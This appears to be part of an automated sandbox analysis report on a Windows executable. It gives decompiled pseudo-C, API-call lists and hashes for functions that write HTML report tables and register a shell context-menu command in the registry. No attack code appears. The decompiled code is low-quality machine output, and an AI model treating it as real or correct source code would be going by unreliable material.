                                                                                                                                                                                                                          0x00403e0a
                                                                                                                                                                                                                          0x00403e0f
                                                                                                                                                                                                                          0x00403e12
                                                                                                                                                                                                                          0x00403e13
                                                                                                                                                                                                                          0x00403e22
                                                                                                                                                                                                                          0x00403e26
                                                                                                                                                                                                                          0x00403e28
                                                                                                                                                                                                                          0x00403e29
                                                                                                                                                                                                                          0x00403e39
                                                                                                                                                                                                                          0x00403e3e
                                                                                                                                                                                                                          0x00403e41
                                                                                                                                                                                                                          0x00403e42
                                                                                                                                                                                                                          0x00403e51
                                                                                                                                                                                                                          0x00403e55
                                                                                                                                                                                                                          0x00403e57
                                                                                                                                                                                                                          0x00403e58
                                                                                                                                                                                                                          0x00403e68
                                                                                                                                                                                                                          0x00403e6d
                                                                                                                                                                                                                          0x00403e70
                                                                                                                                                                                                                          0x00403e71
                                                                                                                                                                                                                          0x00403e71
                                                                                                                                                                                                                          0x00403e87
                                                                                                                                                                                                                          0x00403e8d
                                                                                                                                                                                                                          0x00403e9e
                                                                                                                                                                                                                          0x00403ea6
                                                                                                                                                                                                                          0x00403eaf
                                                                                                                                                                                                                          0x00403ebc

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                            • Part of subcall function 00403B3C: memset.MSVCRT ref: 00403B5D
                                                                                                                                                                                                                            • Part of subcall function 00403B3C: memset.MSVCRT ref: 00403B76
                                                                                                                                                                                                                            • Part of subcall function 00403B3C: _snwprintf.MSVCRT ref: 00403B9F
                                                                                                                                                                                                                            • Part of subcall function 00403B16: SetDlgItemTextW.USER32 ref: 00403B34
                                                                                                                                                                                                                          • DragAcceptFiles.SHELL32(?,00000001), ref: 00403C1B
                                                                                                                                                                                                                          • GetDlgItem.USER32 ref: 00403C2F
                                                                                                                                                                                                                          • SetWindowLongW.USER32 ref: 00403C39
                                                                                                                                                                                                                            • Part of subcall function 00402DDD: GetClientRect.USER32 ref: 00402DEF
                                                                                                                                                                                                                            • Part of subcall function 00402DDD: GetWindow.USER32(?,00000005), ref: 00402E07
                                                                                                                                                                                                                            • Part of subcall function 00402DDD: GetWindow.USER32(00000000), ref: 00402E0A
                                                                                                                                                                                                                            • Part of subcall function 00402DDD: GetWindow.USER32(00000000,00000002), ref: 00402E16
                                                                                                                                                                                                                          • GetModuleHandleW.KERNEL32(00000000), ref: 00403C57
                                                                                                                                                                                                                          • LoadImageW.USER32 ref: 00403C6A
                                                                                                                                                                                                                          • GetModuleHandleW.KERNEL32(00000000), ref: 00403C72
                                                                                                                                                                                                                          • LoadImageW.USER32 ref: 00403C7F
                                                                                                                                                                                                                          • SendMessageW.USER32(?,00000080,00000000,?), ref: 00403C9A
                                                                                                                                                                                                                          • SendMessageW.USER32(?,00000080,00000001,?), ref: 00403CA6
                                                                                                                                                                                                                          • GetDlgItem.USER32 ref: 00403CB0
                                                                                                                                                                                                                            • Part of subcall function 0040AD85: GetProcAddress.KERNEL32(00000000,shlwapi.dll), ref: 0040AD9D
                                                                                                                                                                                                                            • Part of subcall function 0040AD85: FreeLibrary.KERNEL32(00000000,?,00403CB8,00000000), ref: 0040ADB5
                                                                                                                                                                                                                          • GetDlgItem.USER32 ref: 00403CC2
                                                                                                                                                                                                                          • GetDlgItem.USER32 ref: 00403CD4
                                                                                                                                                                                                                            • Part of subcall function 00405B81: GetModuleHandleW.KERNEL32(00000000,?,?,00403490), ref: 00405BC0
                                                                                                                                                                                                                            • Part of subcall function 00405B81: LoadStringW.USER32(00000000,000001F5,?), ref: 00405C59
                                                                                                                                                                                                                            • Part of subcall function 00405B81: memcpy.MSVCRT ref: 00405C99
                                                                                                                                                                                                                            • Part of subcall function 004049D9: SendMessageW.USER32(?,00000143,00000000,?), ref: 004049F0
                                                                                                                                                                                                                            • Part of subcall function 004049D9: SendMessageW.USER32(?,00000151,00000000,?), ref: 00404A02
                                                                                                                                                                                                                            • Part of subcall function 00405B81: wcscpy.MSVCRT ref: 00405C02
                                                                                                                                                                                                                            • Part of subcall function 00405B81: wcslen.MSVCRT ref: 00405C20
                                                                                                                                                                                                                            • Part of subcall function 00405B81: GetModuleHandleW.KERNEL32(00000000,?,?,?,00403490), ref: 00405C2E
                                                                                                                                                                                                                          • GetDlgItem.USER32 ref: 00403D64
                                                                                                                                                                                                                          • GetDlgItem.USER32 ref: 00403DC0
                                                                                                                                                                                                                          • GetDlgItem.USER32 ref: 00403DF0
                                                                                                                                                                                                                          • GetDlgItem.USER32 ref: 00403E20
                                                                                                                                                                                                                          • GetDlgItem.USER32 ref: 00403E4F
                                                                                                                                                                                                                          • SendDlgItemMessageW.USER32 ref: 00403E87
                                                                                                                                                                                                                          • GetDlgItem.USER32 ref: 00403E9B
                                                                                                                                                                                                                          • SetFocus.USER32(00000000), ref: 00403E9E
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000009.00000002.696208987.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696203819.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696217164.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696222837.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696228364.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Item$MessageSend$HandleModuleWindow$Load$Imagememset$AcceptAddressClientDragFilesFocusFreeLibraryLongProcRectStringText_snwprintfmemcpywcscpywcslen
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 1038210931-0
                                                                                                                                                                                                                          • Opcode ID: 480d4766e6d8641b1262395da53219e72a248241b0e6c98f945c6f60a0780f3c
                                                                                                                                                                                                                          • Instruction ID: 1ad7597cb923a57af30b7376ae6fce15a7391ca9e5b6ac25faa2013acf12c195
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 480d4766e6d8641b1262395da53219e72a248241b0e6c98f945c6f60a0780f3c
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D261A6B09407087FE6207F71DC47F2B7A6CEF40714F000A3ABB46751D3DABA69158A59
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          Function 00407763, Relevance: 29.9, APIs: 10, Strings: 7, Instructions: 185COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          C-Code - Quality: 56%
                                                                                                                                                                                                                          			E00407763(intOrPtr* __ebx, intOrPtr _a4, intOrPtr* _a8) {
				signed int _v8;
				signed int _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				void _v138;
				long _v140;
				void _v242;
				char _v244;
				void _v346;
				char _v348;
				void _v452;
				void _v962;
				signed short _v964;
				void* __esi;
				void* _t87;
				wchar_t* _t109;
				intOrPtr* _t124;
				signed int _t125;
				signed int _t140;
				signed int _t153;
				intOrPtr* _t154;
				signed int _t156;
				signed int _t157;
				void* _t159;
				void* _t161;

				_t124 = __ebx;
				_v964 = _v964 & 0x00000000;
				memset( &_v962, 0, 0x1fc);
				_t125 = 0x18;
				memcpy( &_v452, L"<tr><td%s nowrap><b>%s</b><td bgcolor=#%s%s>%s\r\n", _t125 << 2);
				asm("movsw");
				_t153 = 0;
				_v244 = 0;
				memset( &_v242, 0, 0x62);
				_v348 = 0;
				memset( &_v346, 0, 0x62);
				_v140 = 0;
				memset( &_v138, 0, 0x62);
				_t161 = _t159 + 0x3c;
				_t87 =  *((intOrPtr*)( *__ebx + 0x14))();
				_v16 =  *((intOrPtr*)(__ebx + 0x2d4));
				if(_t87 != 0xffffffff) {
					_push(E0040ADC0(_t87,  &_v964));
					_push(L" bgcolor=\"%s\"");
					_push(0x32);
					_push( &_v244);
					L0040B1EC();
					_t161 = _t161 + 0x18;
				}
				E00407343(_t124, _a4, L"<table border=\"1\" cellpadding=\"5\">\r\n");
				_v8 = _t153;
				if( *((intOrPtr*)(_t124 + 0x2c)) > _t153) {
					while(1) {
						_t156 =  *( *((intOrPtr*)(_t124 + 0x30)) + _v8 * 4);
						_v12 = _t156;
						_t157 = _t156 * 0x14;
						if( *((intOrPtr*)(_t157 +  *((intOrPtr*)(_t124 + 0x40)) + 8)) != _t153) {
							wcscpy( &_v140, L" nowrap");
						}
						_v32 = _v32 | 0xffffffff;
						_v28 = _v28 | 0xffffffff;
						_v24 = _v24 | 0xffffffff;
						_v20 = _t153;
						_t154 = _a8;
						 *((intOrPtr*)( *_t124 + 0x34))(6, _v8, _t154,  &_v32);
						E0040ADC0(_v32,  &_v348);
						E0040ADF1( *((intOrPtr*)( *_t154))(_v12,  *((intOrPtr*)(_t124 + 0x60))),  *(_t124 + 0x64));
						 *((intOrPtr*)( *_t124 + 0x50))( *(_t124 + 0x64), _t154, _v12);
						if( *((intOrPtr*)( *_t124 + 0x18))() == 0xffffffff) {
							wcscpy( *(_t124 + 0x68),  *(_t157 + _v16 + 0x10));
						} else {
							_push( *(_t157 + _v16 + 0x10));
							_push(E0040ADC0(_t106,  &_v964));
							_push(L"<font color=\"%s\">%s</font>");
							_push(0x2000);
							_push( *(_t124 + 0x68));
							L0040B1EC();
							_t161 = _t161 + 0x14;
						}
						_t109 =  *(_t124 + 0x64);
						_t140 =  *_t109 & 0x0000ffff;
						if(_t140 == 0 || _t140 == 0x20) {
							wcscat(_t109, L"&nbsp;");
						}
						E0040AE90( &_v32,  *((intOrPtr*)(_t124 + 0x6c)),  *(_t124 + 0x64));
						_push( *((intOrPtr*)(_t124 + 0x6c)));
						_push( &_v140);
						_push( &_v348);
						_push( *(_t124 + 0x68));
						_push( &_v244);
						_push( &_v452);
						_push(0x2000);
						_push( *((intOrPtr*)(_t124 + 0x60)));
						L0040B1EC();
						_t161 = _t161 + 0x28;
						E00407343(_t124, _a4,  *((intOrPtr*)(_t124 + 0x60)));
						_v8 = _v8 + 1;
						if(_v8 >=  *((intOrPtr*)(_t124 + 0x2c))) {
							goto L14;
						}
						_t153 = 0;
					}
				}
				L14:
				E00407343(_t124, _a4, L"</table><p>");
				return E00407343(_t124, _a4, L"\r\n");
			}































                                                                                                                                                                                                                          0x00407763
                                                                                                                                                                                                                          0x0040776c
                                                                                                                                                                                                                          0x00407784
                                                                                                                                                                                                                          0x0040778b
                                                                                                                                                                                                                          0x00407797
                                                                                                                                                                                                                          0x00407799
                                                                                                                                                                                                                          0x0040779b
                                                                                                                                                                                                                          0x004077a7
                                                                                                                                                                                                                          0x004077ae
                                                                                                                                                                                                                          0x004077bd
                                                                                                                                                                                                                          0x004077c4
                                                                                                                                                                                                                          0x004077d3
                                                                                                                                                                                                                          0x004077da
                                                                                                                                                                                                                          0x004077e1
                                                                                                                                                                                                                          0x004077e6
                                                                                                                                                                                                                          0x004077f2
                                                                                                                                                                                                                          0x004077f5
                                                                                                                                                                                                                          0x00407804
                                                                                                                                                                                                                          0x00407805
                                                                                                                                                                                                                          0x00407810
                                                                                                                                                                                                                          0x00407812
                                                                                                                                                                                                                          0x00407813
                                                                                                                                                                                                                          0x00407818
                                                                                                                                                                                                                          0x00407818
                                                                                                                                                                                                                          0x00407825
                                                                                                                                                                                                                          0x0040782d
                                                                                                                                                                                                                          0x00407830
                                                                                                                                                                                                                          0x0040783a
                                                                                                                                                                                                                          0x00407840
                                                                                                                                                                                                                          0x00407846
                                                                                                                                                                                                                          0x00407849
                                                                                                                                                                                                                          0x00407850
                                                                                                                                                                                                                          0x0040785e
                                                                                                                                                                                                                          0x00407864
                                                                                                                                                                                                                          0x00407867
                                                                                                                                                                                                                          0x0040786b
                                                                                                                                                                                                                          0x0040786f
                                                                                                                                                                                                                          0x00407877
                                                                                                                                                                                                                          0x0040787a
                                                                                                                                                                                                                          0x00407885
                                                                                                                                                                                                                          0x00407892
                                                                                                                                                                                                                          0x004078a8
                                                                                                                                                                                                                          0x004078b8
                                                                                                                                                                                                                          0x004078c5
                                                                                                                                                                                                                          0x004078ff
                                                                                                                                                                                                                          0x004078c7
                                                                                                                                                                                                                          0x004078ca
                                                                                                                                                                                                                          0x004078dd
                                                                                                                                                                                                                          0x004078de
                                                                                                                                                                                                                          0x004078e3
                                                                                                                                                                                                                          0x004078e8
                                                                                                                                                                                                                          0x004078eb
                                                                                                                                                                                                                          0x004078f0
                                                                                                                                                                                                                          0x004078f0
                                                                                                                                                                                                                          0x00407906
                                                                                                                                                                                                                          0x00407909
                                                                                                                                                                                                                          0x0040790f
                                                                                                                                                                                                                          0x0040791d
                                                                                                                                                                                                                          0x00407923
                                                                                                                                                                                                                          0x0040792d
                                                                                                                                                                                                                          0x00407932
                                                                                                                                                                                                                          0x0040793b
                                                                                                                                                                                                                          0x00407942
                                                                                                                                                                                                                          0x00407943
                                                                                                                                                                                                                          0x0040794c
                                                                                                                                                                                                                          0x00407953
                                                                                                                                                                                                                          0x00407954
                                                                                                                                                                                                                          0x00407959
                                                                                                                                                                                                                          0x0040795c
                                                                                                                                                                                                                          0x00407961
                                                                                                                                                                                                                          0x0040796c
                                                                                                                                                                                                                          0x00407971
                                                                                                                                                                                                                          0x0040797a
                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                          0x00407838
                                                                                                                                                                                                                          0x00407838
                                                                                                                                                                                                                          0x0040783a
                                                                                                                                                                                                                          0x00407980
                                                                                                                                                                                                                          0x0040798a
                                                                                                                                                                                                                          0x004079a1

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000009.00000002.696208987.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696203819.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696217164.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696222837.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696228364.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: _snwprintfmemset$wcscpy$wcscat
                                                                                                                                                                                                                          • String ID: bgcolor="%s"$ nowrap$&nbsp;$</table><p>$<font color="%s">%s</font>$<table border="1" cellpadding="5">$<tr><td%s nowrap><b>%s</b><td bgcolor=#%s%s>%s
                                                                                                                                                                                                                          • API String ID: 1607361635-601624466
                                                                                                                                                                                                                          • Opcode ID: 79dd95c05abc82e9b2e709e2cd57865f98d2b899bba57f456d4bed9a2e0af9fd
                                                                                                                                                                                                                          • Instruction ID: c59e53cc54c64df10e6b193e6b6ea7c08fa255db16bc08a9aa92b01e8cbfba7b
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 79dd95c05abc82e9b2e709e2cd57865f98d2b899bba57f456d4bed9a2e0af9fd
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C8618E31940208EFDF14AF95CC85EAE7B79FF44310F1041AAF905BA2D2DB34AA54DB99
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          Function 00407B5D, Relevance: 28.1, APIs: 10, Strings: 6, Instructions: 122COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          C-Code - Quality: 40%
                                                                                                                                                                                                                          			E00407B5D(void* __ecx, void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, char _a16, char _a20, intOrPtr _a24) {
				void _v514;
				char _v516;
				void _v1026;
				long _v1028;
				void _v1538;
				char _v1540;
				void _v2050;
				char _v2052;
				char _v2564;
				char _v35332;
				char _t51;
				intOrPtr* _t54;
				void* _t61;
				intOrPtr* _t73;
				void* _t78;
				void* _t79;
				void* _t80;
				void* _t81;

				E0040B550(0x8a00, __ecx);
				_v2052 = 0;
				memset( &_v2050, 0, 0x1fc);
				_v1540 = 0;
				memset( &_v1538, 0, 0x1fc);
				_v1028 = 0;
				memset( &_v1026, 0, 0x1fc);
				_t79 = _t78 + 0x24;
				if(_a20 != 0xffffffff) {
					_push(E0040ADC0(_a20,  &_v2564));
					_push(L" bgcolor=\"%s\"");
					_push(0xff);
					_push( &_v2052);
					L0040B1EC();
					_t79 = _t79 + 0x18;
				}
				if(_a24 != 0xffffffff) {
					_push(E0040ADC0(_a24,  &_v2564));
					_push(L"<font color=\"%s\">");
					_push(0xff);
					_push( &_v1540);
					L0040B1EC();
					wcscpy( &_v1028, L"</font>");
					_t79 = _t79 + 0x20;
				}
				_push( &_v2052);
				_push(L"<table border=\"1\" cellpadding=\"5\"><tr%s>\r\n");
				_push(0x3fff);
				_push( &_v35332);
				L0040B1EC();
				_t80 = _t79 + 0x10;
				E00407343(_a4, _a8,  &_v35332);
				_t51 = _a16;
				if(_t51 > 0) {
					_t73 = _a12 + 4;
					_a20 = _t51;
					do {
						_v516 = 0;
						memset( &_v514, 0, 0x1fc);
						_t54 =  *_t73;
						_t81 = _t80 + 0xc;
						if( *_t54 == 0) {
							_v516 = 0;
						} else {
							_push(_t54);
							_push(L" width=\"%s\"");
							_push(0xff);
							_push( &_v516);
							L0040B1EC();
							_t81 = _t81 + 0x10;
						}
						_push( &_v1028);
						_push( *((intOrPtr*)(_t73 - 4)));
						_push( &_v1540);
						_push( &_v516);
						_push(L"<th%s>%s%s%s\r\n");
						_push(0x3fff);
						_push( &_v35332);
						L0040B1EC();
						_t80 = _t81 + 0x1c;
						_t61 = E00407343(_a4, _a8,  &_v35332);
						_t73 = _t73 + 8;
						_t36 =  &_a20;
						 *_t36 = _a20 - 1;
					} while ( *_t36 != 0);
					return _t61;
				}
				return _t51;
			}





















                                                                                                                                                                                                                          0x00407b65
                                                                                                                                                                                                                          0x00407b7c
                                                                                                                                                                                                                          0x00407b83
                                                                                                                                                                                                                          0x00407b91
                                                                                                                                                                                                                          0x00407b98
                                                                                                                                                                                                                          0x00407ba6
                                                                                                                                                                                                                          0x00407bad
                                                                                                                                                                                                                          0x00407bb2
                                                                                                                                                                                                                          0x00407bb9
                                                                                                                                                                                                                          0x00407bca
                                                                                                                                                                                                                          0x00407bcb
                                                                                                                                                                                                                          0x00407bd6
                                                                                                                                                                                                                          0x00407bdb
                                                                                                                                                                                                                          0x00407bdc
                                                                                                                                                                                                                          0x00407be1
                                                                                                                                                                                                                          0x00407be1
                                                                                                                                                                                                                          0x00407be8
                                                                                                                                                                                                                          0x00407bf9
                                                                                                                                                                                                                          0x00407bfa
                                                                                                                                                                                                                          0x00407c05
                                                                                                                                                                                                                          0x00407c0a
                                                                                                                                                                                                                          0x00407c0b
                                                                                                                                                                                                                          0x00407c1c
                                                                                                                                                                                                                          0x00407c21
                                                                                                                                                                                                                          0x00407c21
                                                                                                                                                                                                                          0x00407c2a
                                                                                                                                                                                                                          0x00407c2b
                                                                                                                                                                                                                          0x00407c36
                                                                                                                                                                                                                          0x00407c3b
                                                                                                                                                                                                                          0x00407c3c
                                                                                                                                                                                                                          0x00407c41
                                                                                                                                                                                                                          0x00407c51
                                                                                                                                                                                                                          0x00407c56
                                                                                                                                                                                                                          0x00407c5b
                                                                                                                                                                                                                          0x00407c65
                                                                                                                                                                                                                          0x00407c68
                                                                                                                                                                                                                          0x00407c6b
                                                                                                                                                                                                                          0x00407c74
                                                                                                                                                                                                                          0x00407c7b
                                                                                                                                                                                                                          0x00407c80
                                                                                                                                                                                                                          0x00407c82
                                                                                                                                                                                                                          0x00407c88
                                                                                                                                                                                                                          0x00407ca6
                                                                                                                                                                                                                          0x00407c8a
                                                                                                                                                                                                                          0x00407c8a
                                                                                                                                                                                                                          0x00407c8b
                                                                                                                                                                                                                          0x00407c96
                                                                                                                                                                                                                          0x00407c9b
                                                                                                                                                                                                                          0x00407c9c
                                                                                                                                                                                                                          0x00407ca1
                                                                                                                                                                                                                          0x00407ca1
                                                                                                                                                                                                                          0x00407cb3
                                                                                                                                                                                                                          0x00407cb4
                                                                                                                                                                                                                          0x00407cbd
                                                                                                                                                                                                                          0x00407cc4
                                                                                                                                                                                                                          0x00407cc5
                                                                                                                                                                                                                          0x00407cd0
                                                                                                                                                                                                                          0x00407cd5
                                                                                                                                                                                                                          0x00407cd6
                                                                                                                                                                                                                          0x00407cdb
                                                                                                                                                                                                                          0x00407ceb
                                                                                                                                                                                                                          0x00407cf0
                                                                                                                                                                                                                          0x00407cf3
                                                                                                                                                                                                                          0x00407cf3
                                                                                                                                                                                                                          0x00407cf3
                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                          0x00407cfc
                                                                                                                                                                                                                          0x00407d00

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000009.00000002.696208987.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696203819.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696217164.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696222837.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696228364.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: _snwprintf$memset$wcscpy
                                                                                                                                                                                                                          • String ID: bgcolor="%s"$ width="%s"$</font>$<font color="%s">$<table border="1" cellpadding="5"><tr%s>$<th%s>%s%s%s
                                                                                                                                                                                                                          • API String ID: 2000436516-3842416460
                                                                                                                                                                                                                          • Opcode ID: d00ccfce514861463375abe2e6db6ffc98356b9832555c3fb27b3b8e17e2f823
                                                                                                                                                                                                                          • Instruction ID: 17ce3237ebe69143205905a5a122d9f10e08837d2ebaecd13bb40ff2a02a5a8b
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d00ccfce514861463375abe2e6db6ffc98356b9832555c3fb27b3b8e17e2f823
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: EA413371D40219AAEB20EB55CC86FAB737CFF45304F0440BAB918B6191D774AB948FA9
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          Function 00404415, Relevance: 26.4, APIs: 10, Strings: 5, Instructions: 124registryCOMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          C-Code - Quality: 51%
                                                                                                                                                                                                                          			E00404415(void* __ecx, void* __eflags, intOrPtr _a4) {
				void* _v8;
				void* _v12;
				void* _v24;
				intOrPtr _v28;
				short _v32;
				void _v2078;
				signed int _v2080;
				void _v4126;
				char _v4128;
				void _v6174;
				char _v6176;
				void _v8222;
				char _v8224;
				signed int _t49;
				short _t55;
				intOrPtr _t56;
				int _t73;
				intOrPtr _t78;

				_t76 = __ecx;
				E0040B550(0x201c, __ecx);
				_t73 = 0;
				if(E004043F8( &_v8, 0x2001f) != 0) {
					L6:
					return _t73;
				}
				_v6176 = 0;
				memset( &_v6174, 0, 0x7fe);
				_t78 = _a4;
				_push(_t78 + 0x20a);
				_push(_t78);
				_push(L"%s\\shell\\%s\\command");
				_push(0x3ff);
				_push( &_v6176);
				L0040B1EC();
				if(E00409ECC(_t76, _v8,  &_v6176,  &_v12) == 0) {
					_t49 = E00409EF4(_v12, 0x40c4e8, _t78 + 0x414);
					asm("sbb ebx, ebx");
					_t73 =  ~_t49 + 1;
					RegCloseKey(_v12);
					_v2080 = _v2080 & 0x00000000;
					memset( &_v2078, 0, 0x7fe);
					E00404AD9( &_v2080);
					if(_v2078 == 0x3a) {
						_t55 =  *L"C:\\"; // 0x3a0043
						_v32 = _t55;
						_t56 =  *0x40ccdc; // 0x5c
						_v28 = _t56;
						asm("stosd");
						asm("stosd");
						asm("stosd");
						_v32 = _v2080;
						if(GetDriveTypeW( &_v32) == 3) {
							_v4128 = 0;
							memset( &_v4126, 0, 0x7fe);
							_v8224 = 0;
							memset( &_v8222, 0, 0x7fe);
							_push(_a4 + 0x20a);
							_push(_a4);
							_push(L"%s\\shell\\%s");
							_push(0x3ff);
							_push( &_v8224);
							L0040B1EC();
							_push( &_v2080);
							_push(L"\"%s\",0");
							_push(0x3ff);
							_push( &_v4128);
							L0040B1EC();
							E00409F1A(_t76, _v8,  &_v8224,  &_v4128);
						}
					}
				}
				RegCloseKey(_v8);
				goto L6;
			}





















                                                                                                                                                                                                                          0x00404415
                                                                                                                                                                                                                          0x0040441d
                                                                                                                                                                                                                          0x0040442c
                                                                                                                                                                                                                          0x00404435
                                                                                                                                                                                                                          0x004045b3
                                                                                                                                                                                                                          0x004045b7
                                                                                                                                                                                                                          0x004045b7
                                                                                                                                                                                                                          0x0040444b
                                                                                                                                                                                                                          0x00404452
                                                                                                                                                                                                                          0x00404457
                                                                                                                                                                                                                          0x00404460
                                                                                                                                                                                                                          0x00404461
                                                                                                                                                                                                                          0x00404462
                                                                                                                                                                                                                          0x0040446d
                                                                                                                                                                                                                          0x00404472
                                                                                                                                                                                                                          0x00404473
                                                                                                                                                                                                                          0x00404490
                                                                                                                                                                                                                          0x004044a5
                                                                                                                                                                                                                          0x004044b4
                                                                                                                                                                                                                          0x004044b6
                                                                                                                                                                                                                          0x004044b7
                                                                                                                                                                                                                          0x004044bd
                                                                                                                                                                                                                          0x004044cf
                                                                                                                                                                                                                          0x004044db
                                                                                                                                                                                                                          0x004044eb
                                                                                                                                                                                                                          0x004044f1
                                                                                                                                                                                                                          0x004044f6
                                                                                                                                                                                                                          0x004044f9
                                                                                                                                                                                                                          0x004044fe
                                                                                                                                                                                                                          0x00404506
                                                                                                                                                                                                                          0x00404507
                                                                                                                                                                                                                          0x00404508
                                                                                                                                                                                                                          0x00404510
                                                                                                                                                                                                                          0x00404521
                                                                                                                                                                                                                          0x00404532
                                                                                                                                                                                                                          0x00404539
                                                                                                                                                                                                                          0x00404547
                                                                                                                                                                                                                          0x0040454e
                                                                                                                                                                                                                          0x0040455b
                                                                                                                                                                                                                          0x0040455c
                                                                                                                                                                                                                          0x00404564
                                                                                                                                                                                                                          0x0040456f
                                                                                                                                                                                                                          0x00404570
                                                                                                                                                                                                                          0x00404571
                                                                                                                                                                                                                          0x0040457c
                                                                                                                                                                                                                          0x0040457d
                                                                                                                                                                                                                          0x00404588
                                                                                                                                                                                                                          0x00404589
                                                                                                                                                                                                                          0x0040458a
                                                                                                                                                                                                                          0x004045a0
                                                                                                                                                                                                                          0x004045a5
                                                                                                                                                                                                                          0x00404521
                                                                                                                                                                                                                          0x004044eb
                                                                                                                                                                                                                          0x004045ab
                                                                                                                                                                                                                          0x00000000

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • memset.MSVCRT ref: 00404452
                                                                                                                                                                                                                          • _snwprintf.MSVCRT ref: 00404473
                                                                                                                                                                                                                            • Part of subcall function 00409ECC: RegCreateKeyExW.ADVAPI32(?,?,00000000,0040C4E8,00000000,000F003F,00000000,?,?,?,?,0040448B,?,?,?,?), ref: 00409EEC
                                                                                                                                                                                                                          • RegCloseKey.ADVAPI32(?,?,?,?,0002001F,?,?,0040390E,?), ref: 004045AB
                                                                                                                                                                                                                            • Part of subcall function 00409EF4: wcslen.MSVCRT ref: 00409EF8
                                                                                                                                                                                                                            • Part of subcall function 00409EF4: RegSetValueExW.ADVAPI32(004044AA,004044AA,00000000,00000001,004044AA,?,004044AA,?,0040C4E8,?,?,?,?,0002001F), ref: 00409F13
                                                                                                                                                                                                                          • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,0002001F,?,?,0040390E,?), ref: 004044B7
                                                                                                                                                                                                                          • memset.MSVCRT ref: 004044CF
                                                                                                                                                                                                                            • Part of subcall function 00404AD9: GetModuleFileNameW.KERNEL32(00000000,e/@,00000104,00402F65,00000000,?,?,00000000), ref: 00404AE4
                                                                                                                                                                                                                          • GetDriveTypeW.KERNEL32(?), ref: 00404518
                                                                                                                                                                                                                          • memset.MSVCRT ref: 00404539
                                                                                                                                                                                                                          • memset.MSVCRT ref: 0040454E
                                                                                                                                                                                                                          • _snwprintf.MSVCRT ref: 00404571
                                                                                                                                                                                                                          • _snwprintf.MSVCRT ref: 0040458A
                                                                                                                                                                                                                            • Part of subcall function 00409F1A: RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00409F57
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000009.00000002.696208987.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696203819.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696217164.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696222837.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696228364.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: memset$Close_snwprintf$CreateDriveFileModuleNameTypeValuewcslen
                                                                                                                                                                                                                          • String ID: "%s",0$%s\shell\%s$%s\shell\%s\command$:$C:\
                                                                                                                                                                                                                          • API String ID: 486436031-734527199
                                                                                                                                                                                                                          • Opcode ID: 1a4cdad823c9c3dfd4e992b957ed6e3c88109aac474059595a3945d4247565ab
